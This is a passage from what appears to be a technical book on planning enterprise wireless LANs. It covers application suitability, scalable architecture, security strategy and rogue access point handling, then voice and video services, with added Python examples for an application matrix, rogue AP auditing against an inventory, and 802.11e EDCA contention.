Web browsing              | Primary, Secondary, Tertiary | No                   | No             | Yes                   | Yes
Calendaring               | Primary, Secondary           | No                   | No             | Yes                   | Yes
HR database application   | Primary                      | Yes                  | Yes            | No                    | No
ERP database application  | Primary                      | No                   | Yes            | No                    | Possible[2]
Wireless Internet traffic | Secondary                    | No                   | No             | Yes                   | No[3]
[1] The wireless video cameras will function perfectly on the WLAN but may use a high amount of bandwidth per cell. The design
team will be advised to limit the number of cameras per cell.
[2] Some configuration may be required on the back end of the ERP database applications to ensure that they are no longer
susceptible to lag of greater than 500 ms.
[3] The project team has been asked to specifically prohibit wireless Internet access for the student body (hot-desk user class;
secondary users).
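The five-step process above can be turned into a small planning tool that produces rows in the shape of Table 3-3. The following is an added example, not code from the book: the per-cell throughput budget, the bandwidth and lag thresholds, the application portfolio and the per-location concurrency figures are all constructed planning assumptions, and the interesting part is Step 4, where an otherwise harmless application such as e-mail is downgraded because it shares a cell with bandwidth-hungry cameras.

```python
"""Produce a wireless application matrix with the five-step process (identify applications,
bandwidth needs, sensitive applications, location interdependencies, matrix)."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Planning figures assumed for this example (constructed, not from the book):
EFFECTIVE_CELL_KBPS = 20_000   # usable throughput of one 802.11g cell after protocol overhead
HIGH_BANDWIDTH_KBPS = 1_500    # per-user demand at or above this makes an application bandwidth sensitive
ROAMING_LAG_MS = 500           # lag a client may see while roaming; apps that cannot absorb it are lag sensitive


@dataclass(frozen=True)
class Application:
    name: str
    user_classes: Tuple[str, ...]    # Step 1: who uses it (primary, secondary, tertiary)
    kbps_per_user: int               # Step 2: sustained demand of one active user
    max_lag_ms: Optional[int]        # Step 3: lag the application tolerates; None = insensitive
    policy_allowed: bool = True      # business policy decision, e.g. "no Internet traffic on the WLAN"


@dataclass
class Location:
    name: str
    concurrent: Dict[str, int]       # Step 4: application name -> users active at once in one cell


def is_bandwidth_sensitive(app: Application) -> bool:
    return app.kbps_per_user >= HIGH_BANDWIDTH_KBPS


def is_lag_sensitive(app: Application) -> bool:
    return app.max_lag_ms is not None and app.max_lag_ms < ROAMING_LAG_MS


def cell_demand_kbps(loc: Location, apps: Dict[str, Application]) -> int:
    """Aggregate demand of everyone sharing one cell at this location."""
    return sum(apps[name].kbps_per_user * users for name, users in loc.concurrent.items())


def overloaded_cells(app_name: str, locations: List[Location], apps: Dict[str, Application]) -> List[str]:
    """Locations where this application shares a cell whose total demand exceeds the budget."""
    return [loc.name for loc in locations
            if app_name in loc.concurrent and cell_demand_kbps(loc, apps) > EFFECTIVE_CELL_KBPS]


def suitability(app: Application, locations: List[Location], apps: Dict[str, Application]) -> str:
    bandwidth, lag = is_bandwidth_sensitive(app), is_lag_sensitive(app)
    if bandwidth and lag:
        return "No"            # neither QoS nor cell design will rescue it
    if bandwidth or lag or overloaded_cells(app.name, locations, apps):
        return "Possible"      # needs QoS, back-end tuning, or smaller cells
    return "Yes"               # network agnostic


def build_matrix(apps: List[Application], locations: List[Location]) -> List[dict]:
    """Step 5: one row per application, in the shape of Table 3-3."""
    by_name = {a.name: a for a in apps}
    rows = []
    for app in apps:
        verdict = suitability(app, locations, by_name)
        rows.append({
            "application": app.name,
            "user_classes": ", ".join(app.user_classes),
            "bandwidth_sensitive": is_bandwidth_sensitive(app),
            "lag_sensitive": is_lag_sensitive(app),
            "suitability": verdict,
            "supported": verdict != "No" and app.policy_allowed,
            "overloaded_cells": overloaded_cells(app.name, locations, by_name),
        })
    return rows


# Constructed portfolio and locations
SAMPLE_APPS = [
    Application("Office applications", ("primary", "secondary"), 100, None),
    Application("E-mail", ("primary", "secondary", "tertiary"), 50, None),
    Application("Wireless video cameras", ("primary",), 2_000, None),
    Application("Web browsing", ("primary", "secondary", "tertiary"), 200, None),
    Application("HR database application", ("primary",), 3_000, 200),
    Application("ERP database application", ("primary",), 100, 300),
    Application("Wireless Internet traffic", ("secondary",), 200, None, policy_allowed=False),
]
SAMPLE_LOCATIONS = [
    Location("Lobby", {"Wireless video cameras": 4, "Web browsing": 10, "E-mail": 10, "Office applications": 10}),
    Location("Warehouse", {"Wireless video cameras": 12, "E-mail": 20}),
]


if __name__ == "__main__":
    for row in build_matrix(SAMPLE_APPS, SAMPLE_LOCATIONS):
        print(f"{row['application']:<26} bw={row['bandwidth_sensitive']!s:<5} "
              f"lag={row['lag_sensitive']!s:<5} suitability={row['suitability']:<8} "
              f"supported={row['supported']!s:<5} overloaded={row['overloaded_cells']}")
```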

Scalable Architecture
In most enterprise environments, it is important that you design your architecture such that it scales in
both capacity and capabilities to meet future requirements. Rip-and-replace should be avoided as much
as possible due to its excessive organizational and financial burden. Take architectural scalability into
account early on. Avoid designs that will not scale across your entire organization or that require
excessive operational and support overheads.

Architecture's Ability to Grow Easily to Support Additional Users and Groups


Endeavor to design the network such that it can expand easily, either within a single location or across
multiple locations. Sometimes this will mean working carefully with the business leaders to align with
corporate strategies and forecasted growth, in addition to considering technical requirements. If your
enterprise is planning on growing at 10 percent per annum over the next five years, it would be rash to
design and implement a WLAN that can only support the current number of users. Avoid nonrepeatable
design characteristics.

Single Points of Failure


Designs that have single points of failure are typically not considered scalable. For example, if your
organization has offices spread across the globe, it is important that you do not architect your WLAN so
that all traffic must flow to a central location or single authentication, authorization, and accounting
(AAA) server. A design that relies upon a single AAA server is not scalable, especially if you might
expand your WLAN to multiple sites in different countries.

Common Architecture That Replicates Easily Across All Sites


Ensure that the architecture is common for all sites if possible. You want to avoid having individual
designs for every site in a large deployment. Standardize as much as possible, ensuring that the WLAN
design is the same in different buildings or sites. Avoid using obsolescent equipment or components that
are hard to source or restricted in certain countries. For example, if you are undertaking a global
deployment, you may wish to ensure that the design can be implemented in Europe, Asia, and the
United States.

Security Strategy
In today's internetworking world, it is always important to think securely. This is especially the case
when dealing with wireless networks due to their broadcast nature. Indeed, press reports on how
wireless networks are insecure and prone to hacking cause undue concerns in many organizations. This
is often called the FUD factor (Fear, Uncertainty, Doubt). The simple fact is that wireless LANs can
be secured. The risk lies with WLANs that are not properly secured or those with poorly designed or
executed security frameworks.
Although you will learn more about security topics in Chapter 7, "Security and Wireless LANs," you
should consider security from the very beginning. Many organizations have information security
departments tasked with addressing such topics specifically. However, security is not the responsibility
of the IT security team alone. Security standards and policies are also the responsibility of the project
implementation team, network engineers, and even business leaders. It may not be possible to finalize
a strategy now. Your goals may become clearer as you architect your WLAN or perhaps after you
analyze a pilot deployment. However, simply considering these issues during the planning phase may
help you highlight the "gaps" in your current security posture and assist you in defining new policies
and guidelines.

Treating the Wireless Network as Trusted or Untrusted


At a high level, there are basically two different schools of thought on how to deal with wireless LAN
security. Either the WLAN is trusted, or it is not. The decision on whether your WLAN will be trusted or
untrusted will have a significant impact upon your architecture and technical design.
A trusted WLAN is treated as simply another transport medium and is fully integrated into the existing
network. Security is provided by robust authentication and encryption features provided by the wireless
security standards and the equipment manufacturer.


An untrusted WLAN is segmented from the core enterprise network as it is considered to be an external
network. The WLAN is effectively an extranet. As such, the access points are behind firewalls, and
security is provided with the same solutions as for providing remote access to the organization's
intranet. A virtual private network (VPN) overlay is a common mechanism for providing secure
connectivity in this environment.

Considering Wireless Security Policies


Clear and well-defined WLAN security policies will not only facilitate communication with the user
community, but also enable the design team to consider specific security requirements early. The
engineering team can then craft specific technical solutions and incorporate them into the WLAN's
design. As such, you should develop a good understanding of your proposed wireless security policies
before you commence the wireless LAN design. The architecture is often influenced by the business and
security policies and decisions you define early. Although you will undoubtedly produce finalized and
more detailed policies, guidelines, and procedures during and after the deployment, it is appropriate to
begin planning these important details now.

Dealing with Rogue Access Points


Rogue access points are access points that are located within your enterprise that were not installed by
your IT department or approved vendors. They present a very serious security threat when connected to
your network as they are improperly configured with little or no security settings. The rogue APs create a
backdoor into your intranet by effectively bypassing any IT security barriers you have constructed.
Rogue APs that are not connected to your network are also a challenge. In these circumstances, the
rogue AP installer has not necessarily compromised enterprise security by connecting his personal
access point to the network, but the simple fact that the access point is even powered and transmitting
can have a negative effect on your official WLAN by creating unwanted radio interference.
A method to deal with rogue access points is essential for any enterprise-class WLAN. It is imperative
that you define a rogue AP strategy early, acquire tools to help search and identify rogue APs, and define
policies and procedures on how they will be dealt with by your IT staff.
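One building block for the rogue AP tooling described above is a script that checks every beacon seen during a scan against the sanctioned AP inventory and ranks what it finds. The following is an added example, not the book's or any vendor's code: the inventory, corporate SSIDs, wired switch MAC table and scan records are all constructed, and the "MAC adjacency" test for a rogue plugged into the LAN is a heuristic assumption, not a proof.

```python
"""Flag rogue access points by comparing scan results with the authorized AP inventory."""
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class Observation:
    bssid: str
    ssid: str
    channel: int
    security: str   # "open", "wep", "wpa", "wpa2" as reported by the scanner


# Constructed inventory: BSSID -> (SSID it should broadcast, channel it should use)
AUTHORIZED_APS: Dict[str, Tuple[str, int]] = {
    "00:11:22:33:44:01": ("CORP-WLAN", 1),
    "00:11:22:33:44:02": ("CORP-WLAN", 6),
    "00:11:22:33:44:03": ("CORP-WLAN", 11),
}
CORPORATE_SSIDS: Set[str] = {"CORP-WLAN", "CORP-GUEST"}

# Constructed MAC addresses learned on the wired access switches (from their CAM tables)
WIRED_MACS: Set[str] = {"AA:BB:CC:00:00:40", "00:11:22:33:44:01", "00:50:56:11:22:33"}

# Constructed scan output: one record per line, "bssid;ssid;channel;security"
SAMPLE_SCAN = """\
# bssid;ssid;channel;security
00:11:22:33:44:01;CORP-WLAN;1;wpa2
00:11:22:33:44:02;CORP-WLAN;11;wpa2
de:ad:be:ef:00:10;CORP-WLAN;6;wpa2
aa:bb:cc:00:00:42;linksys;1;open
12:34:56:78:9a:bc;NeighborCafe;11;wpa2
"""


def parse_scan(text: str) -> List[Observation]:
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        bssid, ssid, channel, security = line.split(";")
        records.append(Observation(bssid.upper(), ssid, int(channel), security.lower()))
    return records


def mac_to_int(mac: str) -> int:
    return int(mac.replace(":", "").replace("-", ""), 16)


def on_wire(bssid: str, wired_macs: Set[str], window: int = 8) -> bool:
    """Heuristic (assumption): many APs derive BSSIDs from their Ethernet MAC, so a wired MAC
    within `window` addresses of the BSSID suggests the radio is plugged into the LAN."""
    b = mac_to_int(bssid)
    return any(abs(mac_to_int(m) - b) <= window for m in wired_macs)


def classify(obs: Observation, authorized, corp_ssids, wired_macs) -> dict:
    """Return a verdict with a severity (0 = fine, 3 = act now) and the reasons behind it."""
    report = {"bssid": obs.bssid, "ssid": obs.ssid, "channel": obs.channel, "reasons": []}
    if obs.bssid in authorized:
        ssid, channel = authorized[obs.bssid]
        if (obs.ssid, obs.channel) == (ssid, channel):
            return {**report, "verdict": "authorized", "severity": 0}
        report["reasons"].append(f"expected SSID {ssid} on channel {channel}")
        return {**report, "verdict": "misconfigured", "severity": 2}

    severity = 1   # unknown radio nearby: at worst an interference source
    if on_wire(obs.bssid, wired_macs):
        report["reasons"].append("MAC adjacent to a wired address: probably connected to the LAN")
        severity = 3
    if obs.ssid in corp_ssids:
        report["reasons"].append("advertises a corporate SSID from an unsanctioned radio")
        severity = max(severity, 3)
    if obs.security == "open":
        report["reasons"].append("no encryption configured")
        severity = max(severity, 2)
    if obs.channel in {ch for _, ch in authorized.values()}:
        report["reasons"].append(f"co-channel with the official WLAN on channel {obs.channel}")
    verdict = "rogue" if severity >= 2 else "neighbor"
    return {**report, "verdict": verdict, "severity": severity}


def audit(scan_text: str, authorized=AUTHORIZED_APS, corp_ssids=CORPORATE_SSIDS,
          wired_macs=WIRED_MACS) -> List[dict]:
    """Classify every observed BSSID, most severe first."""
    results = [classify(o, authorized, corp_ssids, wired_macs) for o in parse_scan(scan_text)]
    return sorted(results, key=lambda r: -r["severity"])


if __name__ == "__main__":
    for r in audit(SAMPLE_SCAN):
        detail = " - " + "; ".join(r["reasons"]) if r["reasons"] else ""
        print(f"[{r['severity']}] {r['bssid']} {r['ssid']!r} ch{r['channel']}: {r['verdict']}{detail}")
```

In practice the scan records come from your own sensors or a scanning tool, and the wired MAC set from the access switches; the example keeps both inline so it runs offline.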

Define High-Level Program Plan


A project plan is a formal, approved document that is used to guide both project execution and project
control. At this early stage, you do not need a detailed plan, but rather a brief outline. This can be as
simple as a generic Gantt chart with the main project tracks and estimated completion months or
quarters noted. This high-level plan will give you a basic understanding of strategy and timelines.
Chapter 6 provides further detail to assist you in defining a more accurate and elaborate deployment
plan. Once again, it is important to note that the basic guidelines and recommendations contained both
here and in Chapter 6 do not obviate the need for you to undertake your deployment in a methodical
and clearly defined manner, preferably following your own project lifecycle and methodology or one of
the national or international standards.

Estimate Resource Requirements


Asking some basic questions, such as the following, will help you estimate your resource requirements:
Will you use internal IT staff?
Will you outsource the site surveys and deployment?
Do you need to engage project-program-specific contractors?
In turn, the answers to these questions will help you calculate how long the program will take in rough
terms. For example, if you are using your own internal IT staff to carry out the site surveys and
deployment, the number of sites that can be installed concurrently will be less than if you engaged the
professional services of an external vendor. In other words, the more physical resources you have at
your disposal, the quicker the project can proceed.

Estimate Budgetary Requirements


Once you have estimated your resource requirements and defined your deployment strategy along with
the breadth and scope of your deployment (as discussed earlier in the "Preparation" section), you should
be able to calculate a rough program budget cost. This is essential for any large-scale deployment and is
a requirement in defining your business case.

Produce Project/Program Plans


At this stage and with the rough estimates and projections you have defined so far, you should be able
to create a rough program/project plan. This plan should include time and resources required for the
design and implementation phase (as detailed in the PPDIOO lifecycle illustrated earlier in Figure 3-1)
and cover the multiple project tracks, including options such as a pilot deployment, and phased
implementation. You will learn more details in Chapter 6, but at this stage you should be able to produce
a high-level program/project plan for your stakeholders as part of your business case.

Follow Your Internal Project Lifecycle


If your organization is a medium to large enterprise, you likely already have a clearly defined project
lifecycle. As such, any advice here may be superfluous; however, at a minimum, you should do the
following:
Clearly set down milestones and decision points (that is, project plan).
Clearly define your scope.
Clearly define your requirements.
Implement a hierarchical program management team.

- Executive/stakeholder team
- Program team
- Individual project teams
Track changes to scope, deliverables, timelines, schedule, and budget.
Regularly report back to your executive management or program stakeholders.

Summary
In this chapter, you have seen the importance of the opening phases of the PPDIOO solution lifecycle.
Before launching a large project, it is important for you to undertake careful preparation and planning.
This includes clearly defining the stakeholders and executives responsible for the project, the target
users, the target sites, and even the target applications for the WLAN. Defining the funding models and
various high-level technical aspects such as security framework (which is covered in more detail in
Chapter 7) and ensuring that you adopt a scalable architecture all help avoid hurdles during the
important design and implementation phases.

Chapter 4. Supplementary and Complementary Services

Chapter 2, "Business Considerations" discussed the value of mobility in your organization and provided
frameworks for identifying the specific areas where WLANs can be most beneficial. You learned about the
mobilization of existing applications as well as applications that you can successfully enable and leverage
when a WLAN is deployed.
Chapter 2 did not discuss all applications and services that a WLAN can enable. Although some
applications and services are important in today's business environment, they are not critical for WLANs.
Consider these as "nice-to-haves" instead of "must haves" in your WLAN.
This chapter introduces you to these supporting services. The chapter outlines what the benefits of these
services are, why they are more challenging to make available, and which recommended practices
should be considered for provisioning them.

The services under consideration can roughly be grouped into two sets:
Supplementary WLAN services make use of the transport mechanism provided by WLANs to
provision a higher-order application. Voice and video fall within this category.
Complementary WLAN services extend the availability of the transport system at the device
level. The accessibility of the WLAN is expanded to a larger user community or the WLAN is used
for device-specific procedures. Guest WLAN access and RF location services are examples of
complementary services.
The rationale for layering supplementary services onto your WLAN is that it increases the value of your
WLAN for your user community. The transport medium becomes completely transparent to the user, and
the entire application suite that is available on the wired networks is made available on the wireless
network. The WLAN thus effectively mobilizes all your applications and users.
Regrettably, this mobilization is not always easy to achieve because some applications are substantially
harder to transfer to a WLAN environment. For example, voice and video are real-time and latency
sensitive applications that demand deterministic network transport. Chapter 1, "Introduction to Wireless
LAN Technologies," revealed that WLANs are susceptible to many internal and external influences. The
number of WLAN users, physical obstacles, and other devices that operate in the same frequency band
all have an impact on throughput and latency. As such, it might seem like a dichotomy to plan to deploy
voice and video applications on a WLAN. This chapter shows that this is not the case.
The situation for complementary services is slightly different. Because you will already have deployed a
WLAN, you can extend its application to additional services, thereby increasing the value you derive from
this technology. Many of today's organizations are characterized by a high degree of fluidity in terms of
individuals visiting office locations. Customers, consultants, and temporary staff are all examples of
people who come and go on a daily basis and who could benefit from basic Internet connectivity. Guest
networks become a viable complementary WLAN service for this transient community because it
provides public hotspot-like connectivity. This chapter covers the benefits and challenges related to
supporting guest WLANs.
A final complementary service that this chapter discusses is WLAN location services, which use the WLAN
to determine the physical location of WLAN-connected devices. This chapter concludes by covering some
of the benefits of location services as well as common implementation considerations.

Voice
Voice over IP (VoIP), which enables telephony over an IP infrastructure, is a complex topic in its own
right. Given the importance of VoIP technology, this section explains the basic considerations for
enabling VoIP on your WLAN. Refer to the "Additional Resources" section at the end of this chapter for
books that cover VoIP, which is a communication protocol, and IP telephony, which is a communication
application, in more detail.
Many of the benefits that are found in wired VoIP are directly applicable to wireless VoIP. Strategic
benefits include the enabling of rich-media content integration and distribution. Operational advantages
consist of ease of maintenance and support through consolidation of the PBX infrastructure and avoiding
the need to support an additional technology. Lastly, financial gains can consist of reduced toll-charges
by routing internal calls across the organization's network instead of the public network.
The challenges of enabling telephony over IP are in the IP protocol itself. Basic IP is by design a
best-effort protocol. No distinction is made between the types of communication sessions and no guarantees
are made regarding timely delivery of packets. E-mails, web traffic, voice, and video are by default all
treated as equal. IP will only try to deliver the packets, and the handling of dropped packets is left up to
the applications. Therefore, some higher-order mechanism is required to enable more deterministic
behavior of the best-effort protocol. This is the domain of quality of service (QoS). QoS refers to a
collection of tools and techniques for classifying, marking, and providing priority handling of traffic.
Classification of traffic is done based on parameters such as protocols, network addresses, devices,
application types, or even time of day. Marking of Layer 2 frames and Layer 3 packets is then performed
to enable different priority processing of traffic. QoS mechanisms thus effectively engineer the traffic so
that it exhibits a more deterministic behavior. WLANs employ 802.11e, a standard that was ratified by
the IEEE in 2005, to provide Layer 2 QoS enhancements for WLAN applications by augmenting the IEEE
802.11 Media Access Control (MAC) layer.
802.11e provides two different types of enhancements. Both types enable the creation of traffic classes.
However, the granularity with which these classes can be manipulated is slightly different. Enhanced
Distributed Coordination Function (EDCF) is the simpler version of 802.11e and only provides a
best-effort QoS. The more complex version, named Hybrid Coordination Function (HCF), offers more
granular configuration possibilities, but has not been widely deployed.
Note that WiFi Multimedia (WMM) is an alternative WLAN QoS standard defined by the WiFi
Alliance. WMM can be considered to be a subset of 802.11e. It was developed while the industry waited
for the IEEE to ratify 802.11e. Now that this ratification has occurred, WMM is less of a consideration for
new deployments. However, it is still a supported technology by many vendors.
Even though many of the VoIP benefits and challenges are shared between wired and wireless LANs,
some challenges are either unique to WLANs or compounded by the nondeterministic behavior of
wireless networks. The following sections focus on these unique challenges by taking a closer look at
WLAN voice devices as well as specific hurdles that must be overcome to enable VoIP on WLANs.

WLAN Voice Devices


Telephony is traditionally associated with dedicated devices. These devices are the handset that you
encounter on desks or mobile telephony handsets. However, the advent of VoIP has made it possible to
convert any general purpose computing device into a telephone. Today, telephones not only come in
hardware, but they also come as software applications. These software versions of phones are
colloquially known as SoftPhones. A SoftPhone application can effectively turn a desktop, laptop, or PDA
into a fully featured telephone. Hence, you should not consider dedicated WLAN telephony handsets as
the only viable alternative for WLAN VoIP.
Various vendors manufacture and sell these WLAN VoIP handsets, and they look and feel like traditional
mobile handsets. The difference is that they use 802.11 instead of analog radio as the transport
mechanism. This is similar to the IP phones that you find on desks which use 802.3 instead of analog
TDM.
To enable consolidation of mobile telephones, several vendors are currently working on dual-mode
handsets. These handsets are capable of interfacing with both WLANs and cellular networks giving users
the option to select the most cost-effective connection. Cellular phones are likely to soon form an
integral part of voice devices that your WLAN needs to support. Figure 4-1 summarizes the many
different types of WLAN voice devices that you can encounter.

Figure 4-1. WLAN Voice Devices

Figure 4-1 shows that WLANs can mobilize voice on devices that traditionally are not considered as
mobile telephony devices. Remain sensitive to this fact and include your strategy for supporting these
devices and telephony in your architecture and design. Chapter 5, "Guidelines for a Successful
Architecture and Design," covers this topic in greater detail.

WLAN Voice Implementation Challenges


The nondeterministic behavior of an IP network can plague the deployment of telephony in the IP
environment. Specifically, latency caused by the nondiscriminating network as well as dropped IP voice
packets can have a significant detrimental impact on voice quality. WLANs compound these challenges in
three ways. The first two are caused by the shared nature of the medium. Not only is available
throughput shared among users, but access to the medium is also granted on a first-come, first-serve
basis. The third challenge relates to the speed with which wireless voice devices can roam from cell to
cell.

Bandwidth and Latency


Whereas bandwidth and latency considerations are important in wired networks, they are critical in
wireless environments. The focus in this case is edge connectivity because backhaul connectivity is
assumed the same irrespective of the wired or wireless connectivity provided to the end user.
The contention that occurs in wired VoIP environments for network access is between different
applications on a client that require network access. The client is connected via a dedicated connection
to an access switch, and applications compete for access to the network. QoS mechanisms can be used
to classify, mark, and provide priority queuing. This alleviates many of the bandwidth and latency
challenges in wired networks.
Unfortunately, this is not the case for WLANs because they share access to the transport medium among
all connected stations. As such, contention for airspace access occurs not only inside of the client, but
also between the clients. Even though a client could provide a higher priority queue for its time-sensitive
applications such as voice (and video), the client must still compete with neighboring clients for airspace
access.

Quality of Service
Because of the aforementioned situation, it is difficult to guarantee timely access to the medium for
voice traffic. 802.11e extends QoS mechanisms to the WLAN Media Access Control (MAC) layer to
increase the probability of gaining access to the network. The simpler method, EDCF, is a "best effort"
QoS method where high priority traffic is given a slightly higher transmission probability than lower
priority traffic.
The more complex type is HCF, which is the 802.11e version that provides features like bandwidth
control, fairness between stations, classes of traffic, jitter management, and so on. As such, WLAN QoS
can be configured with much greater precision with HCF. Even though this method provides more
granularity, it has not been widely implemented yet due to its complexity.
If voice is indeed a critical application for your environment, ensure that both QoS as well as sufficient
bandwidth is provisioned. Avoid situations where many clients are part of the same cell, because doing
so prevents excessive access contention. Chapter 5 provides strategies for determining the appropriate
number of access points for your environment.
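The "slightly higher transmission probability" that EDCF (called EDCA in the ratified standard) gives voice follows from its per-category arbitration interframe space (AIFS) and contention window. The following simulation is an added example, not from the book: it assumes the default 802.11e/WMM EDCA parameter set for 802.11a/g (AC_VO AIFSN 2, CWmin 3, CWmax 7; AC_BE AIFSN 3, CWmin 15, CWmax 1023; 9 µs slot, 10 µs SIFS) and counts how often a voice station wins the medium against a best-effort station when both have a frame ready at the same instant.

```python
"""Monte Carlo estimate of medium-access priority under 802.11e EDCF (EDCA) parameters."""
import random
from dataclasses import dataclass
from typing import Tuple

# 802.11a/g PHY timing (assumed for this example)
SLOT_US = 9
SIFS_US = 10


@dataclass(frozen=True)
class AccessCategory:
    name: str
    aifsn: int    # arbitration interframe space, in slots after SIFS
    cw_min: int   # initial contention window
    cw_max: int   # contention window ceiling after repeated collisions


# Default EDCA parameter set for 802.11a/g (aCWmin = 15, aCWmax = 1023)
AC_VO = AccessCategory("AC_VO", aifsn=2, cw_min=3, cw_max=7)       # voice
AC_VI = AccessCategory("AC_VI", aifsn=2, cw_min=7, cw_max=15)      # video
AC_BE = AccessCategory("AC_BE", aifsn=3, cw_min=15, cw_max=1023)   # best effort
AC_BK = AccessCategory("AC_BK", aifsn=7, cw_min=15, cw_max=1023)   # background


def aifs_us(ac: AccessCategory) -> int:
    """Time a station must sense the medium idle before counting down its backoff."""
    return SIFS_US + ac.aifsn * SLOT_US


def mean_access_delay_us(ac: AccessCategory) -> float:
    """Expected idle-medium wait with no competitor: AIFS plus the mean initial backoff."""
    return aifs_us(ac) + (ac.cw_min / 2) * SLOT_US


def contend(a: AccessCategory, b: AccessCategory, rng: random.Random) -> Tuple[int, int]:
    """Two stations, one frame each, start contending at the same instant.

    Each waits its AIFS and then a uniformly random number of backoff slots in [0, CW].
    The smaller total wins the medium. An equal total is a collision: both stations
    double their CW (capped at CWmax) and draw again. Returns (winner index, collisions).
    """
    cws = [a.cw_min, b.cw_min]
    collisions = 0
    while True:
        totals = [ac.aifsn + rng.randint(0, cw) for ac, cw in zip((a, b), cws)]
        if totals[0] != totals[1]:
            return (0 if totals[0] < totals[1] else 1), collisions
        collisions += 1
        cws = [min(2 * cw + 1, ac.cw_max) for ac, cw in zip((a, b), cws)]


def win_share(a: AccessCategory, b: AccessCategory,
              trials: int = 20000, seed: int = 1) -> Tuple[float, float]:
    """Fraction of contentions won by station a, and mean collisions per contention."""
    rng = random.Random(seed)
    wins = collisions = 0
    for _ in range(trials):
        winner, n = contend(a, b, rng)
        wins += winner == 0
        collisions += n
    return wins / trials, collisions / trials


if __name__ == "__main__":
    for ac in (AC_VO, AC_VI, AC_BE, AC_BK):
        print(f"{ac.name}: AIFS {aifs_us(ac)} us, "
              f"mean uncontended access delay {mean_access_delay_us(ac):.1f} us")
    share, coll = win_share(AC_VO, AC_BE)
    print(f"voice vs best effort: voice wins {share:.1%} of contentions, {coll:.3f} collisions each")
    share, coll = win_share(AC_BE, AC_BE)
    print(f"best effort vs best effort: first station wins {share:.1%}")
```

The result shows the priority is probabilistic: voice wins most, not all, contentions, which is why the section above still asks for sufficient bandwidth and small cells rather than relying on EDCF alone.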

Roaming Clients
A challenge that is unique to WLANs is that of roaming clients. Stations that are on the move transfer
their association from one access point to another. When this transfer occurs, the device must
re-authenticate with the authentication, authorization, and accounting (AAA) infrastructure, thereby
introducing a possible momentary interruption in service. This is especially noticeable in voice
applications where any interruption can result in lost packets and a corresponding impact on voice
quality.
WLAN vendors have addressed this by introducing fast Layer 2 roaming, which reduces the time to
re-authenticate (usually to less than 100 ms or so) as the station moves its association from one access
point to another. This fast roaming capability limits the disruption of the voice stream as packet loss is
minimized.
An additional challenge caused by roaming occurs when a station crosses an Extended Service Set (ESS)
boundary. When a client transfers its association to an AP in a different ESS, it effectively moves into a
different IP subnet. This is known as Layer 3 roaming, as the client device has moved from one IP
subnet to another. Routing issues arise as the station's old IP address is invalid and VoIP sessions can
terminate under these circumstances. If no additional measures are taken, the active call will be
dropped. Figure 4-2 illustrates the effect of mobile VoIP handsets roaming across ESS boundaries and
the resulting invalid IP address in the new ESS.

Figure 4-2. Limitations in WLAN Layer 3 Roaming



Given that most organizations have far more than a single ESS, roaming with mobile voice devices can
become a significant challenge if not addressed in the architecture. Multisite or campus locations will
have a hard time maintaining voice sessions throughout the campus. Various solutions do exist to
address this roaming challenge, and each has its benefits and challenges. These include Mobile IP
Protocol and "predictive" tunneling solutions. Almost all vendors have moved to some type of tunneling
technology to solve the ESS roaming problem. The tunneling solutions are essentially the same as those
discussed later in this chapter for constructing guest networking solutions. Mobile IP is typically deployed
only in difficult environments such as moving vehicles.

Physical Device Attributes


Voice on WLANs brings along a number of considerations that are not necessarily related to the network,
but rather to the physical attributes of the devices. These considerations include battery life and physical
security of the clients.
Battery life is important no matter what kind of mobile device you use. It is especially significant when
contemplating voice because voice is a real-time form of communication. It is certainly more annoying to
lose an active voice session due to battery power depletion than having your laptop warn you of an
impending shutdown.
As always, remain sensitive to security of the device. As opposed to a laptop or desktop, mobile
voice-enabled devices are typically smaller and harder to physically control and secure. Security of mobile
voice devices should not necessarily be thought of in terms of compromise of your network.
Authentication information could indeed be extracted from the device facilitating other attacks. A greater
liability is the information that is stored on the device such as phone books or the ability to make calls
from an active phone, which can result in financial or legal burdens. Use security features such as PIN
codes and policy administration tools to protect access to the devices. For a more in-depth treatise on
security in wireless environments, refer to Chapter 7, "Security and Wireless LANs."

Video
Video is another commonly used application. It is used for broadcasting news, hosting video
conferences, and distributing learning modules. Just like voice, video over IP is a complex and
challenging topic on its own. Therefore, this section does not provide an in-depth technical overview of
all the challenges and solutions that are related to enabling IP video, but instead serves to familiarize
you with key concepts of video as it applies to production enterprise-class WLANs. This section
introduces the different types of video traffic as well as the challenges that are specific to implementing
video in WLAN environments. Refer to the "Additional Resources" section at the end of this chapter for
resources that cover Video over IP in more detail.

Types of Video Traffic


You need to consider the following three parameters when evaluating video over IP-based WLANs:
Distribution mechanism
Timing of the distribution
Quality of the video stream
This section briefly describes each parameter.

Distribution Mechanism
The distribution mechanism refers to the manner in which video is transported across the
communications infrastructure and how stations tune into respective viewing sessions. Generally
speaking, data can be transmitted as broadcast, multicast, or unicast. The differentiation is based on the
number of stations that receive the data, and it is independent of the semantics of the underlying data.
A broadcast transmission sends the data to everybody. Broadcast is one-to-all. In multicast, data is sent
only to stations that have explicitly requested to be sent the data. In this case, the network creates
copies of the transmission when, and only when, different paths are needed to reach the subscribers.
Multicast is thus one-to-many, and its advantage is that it makes more optimal use of network resources
by creating copies of data only when required. Finally, unicast sessions transport data between a single
sender and receiver. Unicast is one-to-one. Figure 4-3 illustrates that unicast is a subset of multicast,
which is a subset of broadcast.

Figure 4-3. Broadcast, Multicast, and Unicast Communications


Timing of the Distribution


Video is an application that permits different timings of transmissions. Users can either retrieve and view
video when they want to, which is known as on-demand viewing, or they can tune into sessions that are
broadcast at predetermined times. This is identical to the options for viewing television. You either tune
into a particular broadcast and subordinate time to content, or you use on-demand to view programs
when it is most convenient for you, in which case you subordinate content to time.
Real-time streaming video applications typically use multicast because it is a more efficient distribution
mechanism. Viewers subscribe to a particular stream, and the network ensures that only the relevant
streams are branched to subscribed viewers. In this manner, redundant copies of the video streams are
avoided. Streaming video is, therefore, ideal for distributing the same information to a large number of
viewers at predetermined times. Company meetings or earnings updates are prime examples.
On-demand video is retrieved at the discretion of the viewer. These types of video applications employ
unicast transport for distribution because the probability that multiple viewers would retrieve exactly the
same content at exactly the same time is extremely low. Examples of content that is ideally suited for
on-demand are online education modules or archived videos.

Quality of the Video Stream


A third distinguishing factor in video is the quality of the video. Video is a data-intensive application that
not only needs to send image data, but also audio information. Video formats such as MPEG-4 and AVI
attempt to reduce the volume of data by compressing the stream before storage or transmission, and
decompressing the information during playback. However, even with this compression, video remains
data intensive.

A strategy for easing the burden of video on communications networks is to make the same content
available in different degrees of quality. Image size and quality can be tailored to best match the
